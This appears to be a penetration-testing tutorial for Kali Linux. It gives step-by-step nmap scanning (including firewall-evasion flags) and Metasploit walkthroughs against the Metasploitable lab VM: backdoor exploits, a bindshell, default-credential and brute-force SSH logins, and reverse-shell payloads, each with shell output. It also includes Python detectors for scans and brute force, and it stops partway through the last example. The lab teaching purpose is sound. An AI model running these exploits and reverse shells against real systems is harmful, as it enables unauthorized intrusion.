Penetration Testing with Kali Linux: Advanced Techniques and Tools

Delving deep into the realm of cybersecurity, this article explores advanced penetration testing techniques using Kali Linux, the premier platform for ethical hacking and network security assessments.

Setting Up Kali Linux for Penetration Testing

Install Kali Linux in a VirtualBox environment, optimized for network penetration testing, and configure it for maximum efficiency and data gathering capabilities.

Advanced Penetration Testing Tools

Utilize a suite of sophisticated tools available in Kali Linux, tailored for comprehensive penetration testing and network vulnerability assessments.

Integrating OSINT in Penetration Testing

Enhance your penetration testing strategy with Open Source Intelligence (OSINT) tools, crucial for in-depth data analysis and reconnaissance.

Essential Linux Commands for Penetration Testers

Master the command line in Kali Linux, deploying a series of critical commands for effective network scanning and vulnerability exploitation.

Simulating Real-World Exploits

Understand real-world exploit scenarios by setting up vulnerable virtual machines and employing various attack strategies to exploit these systems.

Metasploit Framework: A Penetration Tester’s Arsenal

Explore the functionalities of the Metasploit Framework, a powerful tool for developing, testing, and executing exploit code against a remote target machine.

Additional Resources for Penetration Testing

Access a curated list of resources, tutorials, and guides to enhance your skills in penetration testing and stay updated with the latest trends and techniques.

                Steps:

                • Install Kali into VirtualBox and configure the network adapter in Bridged mode

                Tools:

                • use https://ipinfo.info/ to get the IP address of a specific website
                • use https://hunter.io/ to identify email addresses associated with a domain
                • use GitHub to get other tools | example: git clone https://github.com/Tuhinshubhra/RED_HAWK
                • use this link to get a list of the top 25 OSINT (open source intelligence) tools: https://securitytrails.com/blog/osint-tools
                • use email-scarper.py to gather emails associated with a domain (100 links by default, configurable) (https://)

                Notes:

                • the MAC address tells you who you are and the IP address tells you where you are

                Commands:

                • use sudo to execute commands as root | sudo su | exit to return to user
                • print working directory – pwd
                • use ls to list all the contents of a directory: ls -al
                • use touch to create a new file
                • use cat to read the contents of a file
                • use echo to insert text into a file: echo Today is a really good day > testfile
                • use nano as a text editor
                • use mkdir to create a directory/folder
                • use mv to move files: mv file folder
                • use cp -p to copy files
                • use rm -r to remove directories recursively: rm -r *
                • use ifconfig to get the network interfaces and the IP address assigned to the interfaces
                • use nslookup to identify the IP address of a specific website
                • use whois to identify the details about a domain name
                • use whatweb 192.168.1.0-192.168.1.255 --aggression 3 -v --no-errors --log-verbose=FILE to identify the technologies used on a website – https://tools.kali.org/web-applications/whatweb
                • use clear to clear the terminal
                • use theHarvester -d cogeanu.com -b google to get email addresses associated with a website

                Vulnerable Machines for your Lab:

                1. (msfadmin / msfadmin) Metasploitable
                2. UltimateLAMP
                3. Web Security Dojo
                4. OWASP Hackademics
                5. DVWA Damn Vulnerable Web Application
                6. Mutillidae
                7. De-ICE
                8. OWASP Web Goat
                9. Google Gruyere
                10. old Ubuntu versions

                Commands:

                • use sudo netdiscover to list all the active hosts in your network
                • use netstat -nr to discover the Router/Gateway
                • use nmap 192.168.1.1/24 to scan the entire network for open ports
                • use sudo nmap -sS 192.168.1.2 for a TCP SYN scan, where the Kali machine does not open a full TCP connection but sends only the first packet of the 3-way handshake
                • use sudo nmap -sU 192.168.1.2 for a UDP scan
                • use sudo nmap -O 192.168.1.2 to get the operating system running on the target machine
                • use sudo nmap -sV --version-intensity 9 192.168.1.2 to discover the software version running on an open port with increased intensity
                • use sudo nmap -sV 192.168.222.127 -p- for a scan of all 65536 ports on a target machine
                • use sudo nmap -A 192.168.1.2 (aggressive) to enable some advanced features of nmap, OS and version detection included
                • use nmap -sn 192.168.1.1/24 to check which hosts are UP
                • use nmap -p 80,22 192.168.1.1 to check the details of specific ports on the target host, in this case port 22 and port 80
                • use nmap -p 1-65535 192.168.1.1 to check a range of ports
                • use nmap -F 192.168.1.1 to scan the TOP 100 ports (usually the most used, not 1 to 100)
                • use sudo nmap -f 192.168.1.1 to send tiny (8 byte) fragmented packets to avoid detection by a firewall or IDS (3 packets for a 24 byte header)
                • use sudo nmap -f -f 192.168.1.1 to split the packets into 16 bytes per fragment
                • use sudo nmap -D 192.168.1.2,192.168.1.3,192.168.1.5,ME 192.168.1.targetIP to use multiple local IP addresses as decoys while scanning the target
                • use sudo nmap -sD 192.168.1.1 >> outputofscan.txt to write the output to a given file (with no output to the terminal)
                • from /usr/share/nmap/scripts/, use sudo nmap --script auth 192.168.1.1 -sS to run an entire category of scripts against the target (metasploitable) (found tomcat:tomcat on port 8180)
                • from /usr/share/nmap/scripts/, use sudo nmap --script malware 192.168.1.1 -sS to check if the target machine is infected by malware
                • from /usr/share/nmap/scripts/, use sudo nmap --script banner 192.168.1.1 -sS to check the message sent by an open port on the target machine (usually an information disclosure – the exact version of the software running on that port)
                • from /usr/share/nmap/scripts/, use sudo nmap --script exploit 192.168.1.1 -sS to run the scripts that aim to actively exploit some vulnerability (port 21 ftp user:root pass: root)
                • from /usr/share/nmap/scripts/, use sudo nmap --script-help firewall-bypass.nse to get details about what a certain script is able to do
                • from /usr/share/nmap/scripts/, use sudo nmap --script firewall-bypass.nse 192.168.1.1 to execute the above-mentioned script
                • use ftp 192.168.1.1 to connect over ftp to the target machine (anonymous | password123) (help for help | exit to exit)
                • use sudo nmap -sV 192.168.1.2 to discover the software version running on an open port (default intensity is 7) and then simply google the software and the version + exploit (example: VSFTPD v2.3.4 Backdoor Command Execution – https://www.rapid7.com/db/modules/exploit/unix/ftp/vsftpd_234_backdoor/) or (apache httpd 2.2.8 exploit – https://charlesreid1.com/wiki/Metasploitable/Apache | https://www.cvedetails.com/vulnerability-list.php?vendor_id=45&product_id=66&version_id=416233)
                • use searchsploit UnrealIRCd to search the Kali Linux exploit library (Exploit-DB) for exploits that could be used
                • use locate 49757.py to find the location of a script that can be used to exploit a vulnerability identified by the searchsploit command above
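The -sV output the commands above print is easier to act on as a report. As an added example (not part of the original notes and not an nmap feature), here is a Python script that parses the XML nmap writes with -oX into a service inventory and attaches review flags: cleartext protocol, exact version disclosed by the banner (the information disclosure the banner script note describes), and an unauthenticated shell. The XML is a constructed sample laid out like real nmap output, with the Metasploitable ports these notes use; the flag names and the CLEARTEXT_SERVICES set are this example's own choices.

```python
# Added example (not from the original page): parse the XML that `nmap -sV -oX`
# writes and turn it into a service inventory with simple review flags.
# The XML below is a constructed sample in nmap's real output structure; the
# services mirror the Metasploitable ports the notes above mention.
import xml.etree.ElementTree as ET

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX - 192.168.222.127">
<host><status state="up"/>
<address addr="192.168.222.127" addrtype="ipv4"/>
<ports>
<port protocol="tcp" portid="21"><state state="open"/><service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/></port>
<port protocol="tcp" portid="22"><state state="open"/><service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" extrainfo="protocol 2.0"/></port>
<port protocol="tcp" portid="23"><state state="open"/><service name="telnet" product="Linux telnetd"/></port>
<port protocol="tcp" portid="80"><state state="closed"/></port>
<port protocol="tcp" portid="1524"><state state="open"/><service name="bindshell" product="Metasploitable root shell"/></port>
<port protocol="tcp" portid="5900"><state state="open"/><service name="vnc" product="VNC" extrainfo="protocol 3.3"/></port>
</ports></host></nmaprun>
"""

# Protocols that carry credentials in clear text; an open one is a finding on its own.
CLEARTEXT_SERVICES = {"ftp", "telnet"}


def parse_nmap_xml(xml_text):
    """Return one dict per open port: host, port, proto, service, product, version."""
    root = ET.fromstring(xml_text)
    inventory = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            if port.find("state").get("state") != "open":
                continue
            svc = port.find("service")
            inventory.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "service": svc.get("name", "") if svc is not None else "",
                "product": svc.get("product", "") if svc is not None else "",
                "version": svc.get("version", "") if svc is not None else "",
            })
    return inventory


def review_flags(entry):
    """Flags a reviewer would want next to each inventory row (names chosen here)."""
    flags = []
    if entry["service"] in CLEARTEXT_SERVICES:
        flags.append("cleartext-protocol")
    if entry["version"]:
        # The banner disclosed an exact version: what the 'banner' script note warns about.
        flags.append("version-disclosed")
    if entry["service"] == "bindshell":
        flags.append("unauthenticated-shell")
    return flags


def build_report(xml_text):
    """Inventory rows sorted by port, each with its review flags attached."""
    rows = []
    for entry in sorted(parse_nmap_xml(xml_text), key=lambda e: e["port"]):
        entry["flags"] = review_flags(entry)
        rows.append(entry)
    return rows


if __name__ == "__main__":
    for row in build_report(SAMPLE_NMAP_XML):
        print(f'{row["host"]}:{row["port"]}/{row["proto"]:<3} {row["service"]:<10} '
              f'{row["product"]} {row["version"]}  {",".join(row["flags"])}')
```

Run a real scan with `sudo nmap -sV -oX scan.xml <target>` and feed the file's contents to build_report; closed and filtered ports are skipped so the report only lists what is actually reachable.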

                Notes:

                • use sudo nmap -sS 192.168.1.2 instead of nmap -sT 192.168.1.2 as the first one leaves fewer traces on the target system; -sT makes more noise on the target machine
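The reason -sS is quieter is that the target's services never see a completed connection, so nothing lands in their application logs; the traces it does leave are at the network layer. As an added example (not from the original notes), here is a Python detector over constructed firewall-style connection-log lines that flags a source sending SYNs to many distinct ports in a short window without ever sending an ACK to them. The log line format, the addresses and the thresholds are assumptions made for this example.

```python
# Added example (not from the original page): spot a SYN scan in firewall-style
# connection logs. A -sS scan sends a SYN to many ports and never completes the
# handshake, so the target's application logs see nothing; a -sT scan completes
# the handshake and shows up in the service's own logs. The log format, the
# addresses and the thresholds below are constructed for this example.
import re
from collections import defaultdict
from datetime import datetime

LOG_RE = re.compile(
    r"^(?P<ts>\S+) src=(?P<src>[\d.]+) dst=(?P<dst>[\d.]+) "
    r"dport=(?P<dport>\d+) flags=(?P<flags>[A-Z]+)$"
)

# Constructed sample: one host probes 20 ports with bare SYNs inside a few seconds,
# another host opens an ordinary SSH session (SYN followed by ACKs on one port).
SAMPLE_LOG = "\n".join(
    [f"2021-08-18T17:30:{i:02d} src=192.168.222.59 dst=192.168.222.127 dport={p} flags=S"
     for i, p in enumerate([21, 22, 23, 25, 53, 80, 111, 139, 445, 512, 513, 514,
                            1099, 1524, 2049, 2121, 3306, 5432, 5900, 6000])]
    + ["2021-08-18T17:30:05 src=192.168.222.10 dst=192.168.222.127 dport=22 flags=S",
       "2021-08-18T17:30:05 src=192.168.222.10 dst=192.168.222.127 dport=22 flags=A",
       "2021-08-18T17:30:06 src=192.168.222.10 dst=192.168.222.127 dport=22 flags=PA"]
)


def parse_log(text):
    """Yield (timestamp, src, dst, dport, flags) for every well-formed line."""
    for line in text.splitlines():
        m = LOG_RE.match(line.strip())
        if m:
            yield (datetime.fromisoformat(m["ts"]), m["src"], m["dst"],
                   int(m["dport"]), m["flags"])


def detect_syn_scans(text, min_ports=10, window_seconds=60):
    """Return {src: sorted half-open ports} for sources that sent a SYN to at
    least `min_ports` distinct ports inside `window_seconds` and never sent an
    ACK to any of them (the half-open pattern of a SYN scan)."""
    syn_times = defaultdict(dict)   # (src, dst) -> {dport: first SYN time}
    acked = defaultdict(set)        # (src, dst) -> ports where an ACK was seen
    for ts, src, dst, dport, flags in parse_log(text):
        key = (src, dst)
        if flags == "S":
            syn_times[key].setdefault(dport, ts)
        elif "A" in flags:
            acked[key].add(dport)

    findings = {}
    for (src, dst), ports in syn_times.items():
        half_open = {p: t for p, t in ports.items() if p not in acked[(src, dst)]}
        if len(half_open) < min_ports:
            continue
        times = sorted(half_open.values())
        # Sliding window over the SYN timestamps: does any window hold enough ports?
        lo = 0
        for hi in range(len(times)):
            while (times[hi] - times[lo]).total_seconds() > window_seconds:
                lo += 1
            if hi - lo + 1 >= min_ports:
                findings[src] = sorted(half_open)
                break
    return findings


if __name__ == "__main__":
    for src, ports in detect_syn_scans(SAMPLE_LOG).items():
        print(f"possible SYN scan from {src}: {len(ports)} half-open ports, e.g. {ports[:5]}")
```

The legitimate client touches one port and completes the handshake, so it never reaches the threshold; the scanner's twenty half-open ports inside twenty seconds do. Tune min_ports and window_seconds to the traffic of the network being watched.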

                Resources:

                • use cd /usr/share/nmap/scripts/ for a full list of nmap scripts that could help with target scanning | described here: https://nmap.org/book/nse-usage.html

                Setup and Configuration:

                • Download Nessus Essentials 8.15.1 from: https://www.tenable.com/downloads/nessus
                • choose: Nessus-8.15.1-debian6_amd64.deb | Debian 9, 10 / Kali Linux 1, 2017.3, 2018, 2019, 2020 AMD64
                • to install, open terminal in the Download directory and type: sudo dpkg -i Nessus-8.15.1-debian6_amd64.deb
                • after installation to start Nessus: sudo /bin/systemctl start nessusd.service
                • to use Nessus, browser: https://kali:8834/ (Accept the browser warnings)
                • register with name and business email (real) so that you can receive the single use Serial Number (recommended to obtain the SN using the webpage request process)
                • with the SN received in email continue the setup process
                • setup a new username and password
                • after all this expect 1 hour of downloading and compiling the required modules (I suggest temporarily allocating more RAM and vCPU to the Kali VM :D )

                Usage:

                • Click on the “new scan” button
                • with the free version you can only scan 16 IP addresses (this resets after 90 days)
                • on the Basic tab select “Basic Network Scan”, in Name enter: Metasploitable and in Targets insert the IP address of the Metasploitable VM
                • on the Discovery tab select Scan type: Port scan (all ports)
                • on the Assessment tab select Scan for known web vulnerabilities – or a more intensive option
                • Click Save and then Launch it by clicking the Play symbol

                • path to the Metasploit Framework: cd /usr/share/metasploit-framework/

                The 7 module types the Metasploit Framework contains:

                • exploits (buffer overflow, code injection, web application)
                • auxiliary (does not execute a payload as an exploit module does, but instead is used to perform different actions such as scanning, fuzzing or denial of service attacks; information gathering, fingerprinting, scanning)
                • post (used, as the name says, after exploiting the target, to gather or steal information from the target device: files, saved passwords, dumping hashes, enumerating services and applications on the target)
                • payloads (delivered to the target with an exploit in order to control the machine: singles are payloads that are completely stand-alone | stagers set up a network connection between the attacker and the victim, are small and reliable (bind or reverse; almost all the time we will use reverse tcp) | stages are payload components that are downloaded by stager modules and can provide advanced features with no size limit, for example Meterpreter shells (malware, trojan or virus) that can download files, upload files, record the microphone, run the webcam, take screenshots, etc.)
                • encoders (help evade antivirus detection)
                • evasion (similar to encoders, mainly designed to evade Windows Defender)
                • nops (no-operation is an instruction for the processor to do nothing, useful in buffer overflows to allocate a lot of space in memory before the payload executes)

                msfconsole and msfvenom

                To run the Metasploit Framework simply run msfconsole in the terminal

                • use show payloads command to list all the payloads

                • to use a certain exploit use the command: use followed by the name of the module, example: msf6 > use payload/windows/x64/shell/bind_tcp_rc4
                • use show info to get more details about what the particular module exploit can do
                • use show options to understand what the module needs to function
                • use set <parameter name> example LHOST to change the default already configured IP address
                • running show payloads again will now not list all the payloads but only the ones that are compatible with the currently selected exploit
                • use set payload <payload name> to change the default selected payload to another one you have chosen
                • use show targets to get a full list of targets that we can exploit using this attack
                • use set target 3 to select the 3rd option listed by running the command above
                • use exploit to enable/run the exploit

                Example 1 – vsftpd 2.3.4

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
                • let’s choose the FTP port: 21/tcp open ftp vsftpd 2.3.4
                • the goal is to find an exploit if this software is vulnerable
                • as an initial action, before googling for possible exploits, you can use the Metasploit Framework
                • on terminal2: run $ searchsploit vsftpd 2.3.4
                • on terminal3: run msfconsole and then type: msf6 > search vsftpd
                • msf6 > use exploit/unix/ftp/vsftpd_234_backdoor
                • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show info
                • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show options
                • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > set RHOSTS 192.168.222.127
                • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show payloads
                • msf6 exploit(unix/ftp/vsftpd_234_backdoor) > show targets

                msf6 exploit(unix/ftp/vsftpd_234_backdoor) > exploit

                [*] 192.168.222.127:21 – Banner: 220 (vsFTPd 2.3.4)
                [*] 192.168.222.127:21 – USER: 331 Please specify the password.
                [+] 192.168.222.127:21 – Backdoor service has been spawned, handling…
                [+] 192.168.222.127:21 – UID: uid=0(root) gid=0(root)
                [*] Found shell.
                [*] Command shell session 1 opened (0.0.0.0:0 -> 192.168.222.127:6200) at 2021-08-18 17:39:36 -0400

                whoami
                root
                ifconfig
                eth0 Link encap:Ethernet HWaddr 08:00:27:e1:70:b1
                inet addr:192.168.222.127 Bcast:192.168.222.2 Mask:255.255.255.0
                inet6 addr: fe80::a00:27ff:fee1:70b1/64 Scope:Link

                • to exit a shell just type: exit

                exit
                [*] 192.168.222.127 – Command shell session 1 closed.
                msf6 exploit(unix/ftp/vsftpd_234_backdoor) >

                Example 2 – Misconfiguration bindshell

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
                • let’s choose the 1524/tcp open bindshell Metasploitable root shell
                • on terminal2 let’s use a tool called netcat (a program used to establish network connections with other machines using both tcp and udp)
                • to check the help menu run: (mrhacker㉿kali)-[~/Desktop] nc -h
                  [v1.10-46]
                  connect to somewhere: nc [-options] hostname port[s] [ports] …
                  listen for inbound: nc -l -p port [-options] [hostname] [port]
                • to use it run:

                ┌──(mrhacker㉿kali)-[~/Desktop]
                └─$ nc 192.168.222.127 1524
                root@metasploitable:/#

                Example 3 – telnet

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
                • let’s choose the 23/tcp open telnet Linux telnetd
                • on terminal2: run $ searchsploit Linux telnetd | no real helpful results found
                • let’s try the default username and password: telnet 192.168.222.127

                ┌──(mrhacker㉿kali)-[~]
                └─$ telnet 192.168.222.127
                Trying 192.168.222.127…
                Connected to 192.168.222.127.
                Escape character is ‘^]’.
                _ _ _ _ _ _ ____
                _ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
                | ‘_ ` _ \ / _ \ __/ _` / __| ‘_ \| |/ _ \| | __/ _` | ‘_ \| |/ _ \ __) |
                | | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
                |_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
                |_|

                Warning: Never expose this VM to an untrusted network!
                Contact: msfdev[at]metasploit.com
                Login with msfadmin/msfadmin to get started

                metasploitable login: msfadmin
                Password:
                Last login: Wed Aug 18 17:19:18 EDT 2021 on tty1
                Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686

                The programs included with the Ubuntu system are free software;
                the exact distribution terms for each program are described in the
                individual files in /usr/share/doc/*/copyright.

                Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
                applicable law.

                To access official Ubuntu documentation, please visit:
                http://help.ubuntu.com/
                No mail.
                msfadmin@metasploitable:~$ whoami
                msfadmin
                msfadmin@metasploitable:~$ sudo su
                [sudo] password for msfadmin:
                root@metasploitable:/home/msfadmin# whoami
                root
                root@metasploitable:/home/msfadmin#

                Example 4 – Samba

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
                • let’s choose the 139/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
                • and this one: 445/tcp open netbios-ssn Samba smbd 3.X – 4.X (workgroup: WORKGROUP)
                • on terminal2: run $ searchsploit Samba | too many results, we need to narrow it down
                • on terminal3: run $ msfconsole | and then run: msf6 > search samba | some results, but not the ones that we are looking for
                • let’s then try: msf6 > use auxiliary/scanner/smb/ and try this module: 12 auxiliary/scanner/smb/smb_version
                • msf6 auxiliary(scanner/smb/smb_version) > show info
                • msf6 auxiliary(scanner/smb/smb_version) > show options
                • msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.222.127
                • msf6 auxiliary(scanner/smb/smb_version) > exploit
                • valuable output identified: [*] 192.168.222.127:445 – Host could not be identified: Unix (Samba 3.0.20-Debian)
                • on terminal2: run $ searchsploit Samba 3.0.20 | excluding all the txt files and the py files we are left with only one valid option: Samba 3.0.20 < 3.0.25rc3 – 'Username' map script' Command Execution (Metasploit) – unix/remote/16320.rb
                • on terminal3: msf6 > search Samba | now we know that we are interested in: 8 exploit/multi/samba/usermap_script
                • msf6 > use exploit/multi/samba/usermap_script
                • msf6 exploit(multi/samba/usermap_script) > show info
                • msf6 exploit(multi/samba/usermap_script) > show options
                • msf6 exploit(multi/samba/usermap_script) > set RHOSTS 192.168.222.127
                  RHOSTS => 192.168.222.127
                  msf6 exploit(multi/samba/usermap_script) > run
                  [*] Started reverse TCP handler on 192.168.222.59:4444
                  [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:34804) at 2021-08-19 05:29:39 -0400
                  whoami
                  root

                Example 5 – Brute-force SSH Attack

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run $ sudo nmap -sV 192.168.222.127 to discover the software version running on an open port (default intensity is 7)
                • let’s choose this one again: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
                • on terminal2: msf6 > search ssh | out of the long list let’s select this one: 45 auxiliary/scanner/ssh/ssh_login
                • msf6 > use auxiliary/scanner/ssh/ssh_login
                • on terminal3: /home/mrhacker/Desktop/ nano usernames.txt | type inside a few possible usernames, including the correct one: admin, root, toor, user123, msfadmin, admin123 | one per line
                • on terminal3: /home/mrhacker/Desktop/ nano passwords.txt | type inside a few possible passwords, including the correct one: password, password123, helloworld, msfadmin, test1234 | one per line
                • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set PASS_FILE /home/mrhacker/Desktop/passwords.txt
                  PASS_FILE => /home/mrhacker/Desktop/passwords.txt
                • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set USER_FILE /home/mrhacker/Desktop/usernames.txt
                  USER_FILE => /home/mrhacker/Desktop/usernames.txt
                • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set RHOSTS 192.168.222.127
                  RHOSTS => 192.168.222.127
                • on terminal2: msf6 auxiliary(scanner/ssh/ssh_login) > set VERBOSE true
                  VERBOSE => true
                • msf6 auxiliary(scanner/ssh/ssh_login) > exploit
                • [+] 192.168.222.127:22 – Success: ‘msfadmin:msfadmin’ ‘uid=1000(msfadmin) gid=1000(msfadmin) groups=4(adm),20(dialout),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),107(fuse),111(lpadmin),112(admin),119(sambashare),1000(msfadmin) Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux ‘
                  [*] Command shell session 1 opened (192.168.222.59:33103 -> 192.168.222.127:22) at 2021-08-19 06:29:09 -0400
                  [-] 192.168.222.127:22 – Failed: ‘admin123:password’
                • msf6 auxiliary(scanner/ssh/ssh_login) > sessions
                • msf6 auxiliary(scanner/ssh/ssh_login) > sessions -i 1
                  [*] Starting interaction with 1…
                  whoami
                  msfadmin
                  sudo su
                  [sudo] password for msfadmin: msfadmin
                  whoami
                  root
                • as we now have the username and password we could ssh into the machine using the discovered credentials: msfadmin/msfadmin
                • ┌──(mrhacker㉿kali)-[~]
                  └─$ ssh msfadmin@192.168.222.127
                  msfadmin@192.168.222.127’s password:
                  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686
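The defender's view of the run above is the target's sshd log: every guess the ssh_login module makes is a "Failed password" line, and the one that works is an "Accepted password" line from the same source in the middle of the burst. As an added example (not from the original notes), here is a Python parser for auth.log lines that groups failed attempts per source address, measures the densest burst, and reports whether a login was accepted from that source while the burst was running. The log lines, hostname, PIDs, ports and thresholds are constructed for the example.

```python
# Added example (not from the original page): detect an SSH password-guessing burst
# in sshd's auth.log lines, the log-side view of an ssh_login run. The lines are
# constructed to resemble what the target would record; hostname, PIDs, ports and
# timestamps are made up.
import re
from collections import defaultdict
from datetime import datetime

SSHD_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Accepted|Failed) (?:password|publickey) for (?:invalid user )?(?P<user>\S+) "
    r"from (?P<src>[\d.]+) port \d+ ssh2$"
)

# Constructed sample: one source guesses six users in a few seconds and gets one
# accepted; a second source has a single typo followed by a normal key login.
SAMPLE_AUTH_LOG = """\
Aug 19 06:29:05 metasploitable sshd[4401]: Failed password for invalid user admin from 192.168.222.59 port 33096 ssh2
Aug 19 06:29:05 metasploitable sshd[4402]: Failed password for root from 192.168.222.59 port 33097 ssh2
Aug 19 06:29:06 metasploitable sshd[4403]: Failed password for invalid user toor from 192.168.222.59 port 33098 ssh2
Aug 19 06:29:06 metasploitable sshd[4404]: Failed password for invalid user user123 from 192.168.222.59 port 33099 ssh2
Aug 19 06:29:07 metasploitable sshd[4405]: Failed password for msfadmin from 192.168.222.59 port 33100 ssh2
Aug 19 06:29:08 metasploitable sshd[4406]: Failed password for msfadmin from 192.168.222.59 port 33101 ssh2
Aug 19 06:29:09 metasploitable sshd[4407]: Accepted password for msfadmin from 192.168.222.59 port 33103 ssh2
Aug 19 06:29:10 metasploitable sshd[4408]: Failed password for invalid user admin123 from 192.168.222.59 port 33104 ssh2
Aug 19 06:31:00 metasploitable sshd[4420]: Failed password for msfadmin from 192.168.222.10 port 50122 ssh2
Aug 19 06:31:30 metasploitable sshd[4421]: Accepted publickey for msfadmin from 192.168.222.10 port 50123 ssh2
"""


def parse_auth_log(text, year=2021):
    """Yield (timestamp, result, user, src) for each sshd authentication line.
    syslog timestamps carry no year, so the caller supplies one."""
    for line in text.splitlines():
        m = SSHD_RE.match(line)
        if m:
            ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
            yield ts, m["result"], m["user"], m["src"]


def detect_bruteforce(text, max_failures=5, window_seconds=60):
    """Per source address that reached `max_failures` failed logins inside
    `window_seconds`: total failures, size of the densest burst, the users tried,
    and any user whose login was accepted from that source during the burst."""
    events = defaultdict(list)
    for ts, result, user, src in parse_auth_log(text):
        events[src].append((ts, result, user))

    findings = {}
    for src, evs in events.items():
        evs.sort()
        failures = [e for e in evs if e[1] == "Failed"]
        # Sliding window over failure timestamps to find the densest burst.
        best, lo = 0, 0
        for hi in range(len(failures)):
            while (failures[hi][0] - failures[lo][0]).total_seconds() > window_seconds:
                lo += 1
            best = max(best, hi - lo + 1)
        if best < max_failures:
            continue
        first_fail, last_fail = failures[0][0], failures[-1][0]
        guessed = sorted({u for ts, r, u in evs
                          if r == "Accepted" and first_fail <= ts <= last_fail})
        findings[src] = {
            "failures": len(failures),
            "burst": best,
            "users_tried": sorted({u for _, _, u in failures}),
            "accepted_during_burst": guessed,
        }
    return findings


if __name__ == "__main__":
    for src, info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"{src}: {info['failures']} failures (burst of {info['burst']}), "
              f"users {info['users_tried']}, accepted: {info['accepted_during_burst']}")
```

An "accepted_during_burst" entry is the one to act on first: the source did not just knock, it got in with a guessed password, so that account's credential needs rotating and the session reviewing. Fail2ban-style blocking would key on the same per-source failure count.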

                 

                Example 6 – distccd

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
                • let’s try this one: 3632/tcp open distccd distccd v1 ((GNU) 4.2.4 (Ubuntu 4.2.4-1ubuntu4))
                • on terminal2: msfconsole and then run: msf6 > search distc | only one record found: exploit/unix/misc/distcc_exec
                • msf6 > use exploit/unix/misc/distcc_exec
                • msf6 exploit(unix/misc/distcc_exec) > show options
                • msf6 exploit(unix/misc/distcc_exec) > set RHOSTS 192.168.222.127 (remote host)
                • msf6 exploit(unix/misc/distcc_exec) > show payloads
                • msf6 exploit(unix/misc/distcc_exec) > set payload cmd/unix/reverse
                  payload => cmd/unix/reverse
                • msf6 exploit(unix/misc/distcc_exec) > set LHOST 192.168.222.59 (listening host)
                  LHOST => 192.168.222.59
                • msf6 exploit(unix/misc/distcc_exec) > exploit
                  [*] Started reverse TCP double handler on 192.168.222.59:4444
                  [*] Accepted the first client connection…
                  [*] Accepted the second client connection…
                  [*] Command: echo 9JUz23ZkTBY4MuQx;
                  [*] Writing to socket A
                  [*] Writing to socket B
                  [*] Reading from sockets…
                  [*] Reading from socket B
                  [*] B: “9JUz23ZkTBY4MuQx\r\n”
                  [*] Matching…
                  [*] A is input…
                  [*] Command shell session 1 opened (192.168.222.59:4444 -> 192.168.222.127:50819) at 2021-08-19 10:37:49 -0400
                  whoami
                  daemon
                  hostname
                  metasploitable
                  uname -a
                  Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

                Example 7 – UnrealIRCd

                • check the IP address of the Metasploitable virtual machine ifconfig: 192.168.222.127
                • on terminal1: run sudo nmap -sV 192.168.222.127 -p- to discover the software version running on an open port on all 65536 available ports
                • let’s try these ones: 6667/tcp open irc UnrealIRCd | 6697/tcp open irc UnrealIRCd
                • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit irc | too many findings
                • on terminal2: (mrhacker㉿kali)-[~/Desktop] $ searchsploit UnrealIRCd | just 4 findings, and only one Ruby: UnrealIRCd 3.2.8.1 – Backdoor Command Execution (Metasploit) linux/remote/16922.rb
                • on terminal3: msfconsole and then run: msf6 > search UnrealIRCd
                • msf6 > use 0
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show options
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set RHOSTS 192.168.222.127
                  RHOSTS => 192.168.222.127
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > show payloads
                • msf6 exploit(unix/irc/unreal_ircd_3281_backdoor) > set payload cmd/unix/reverse
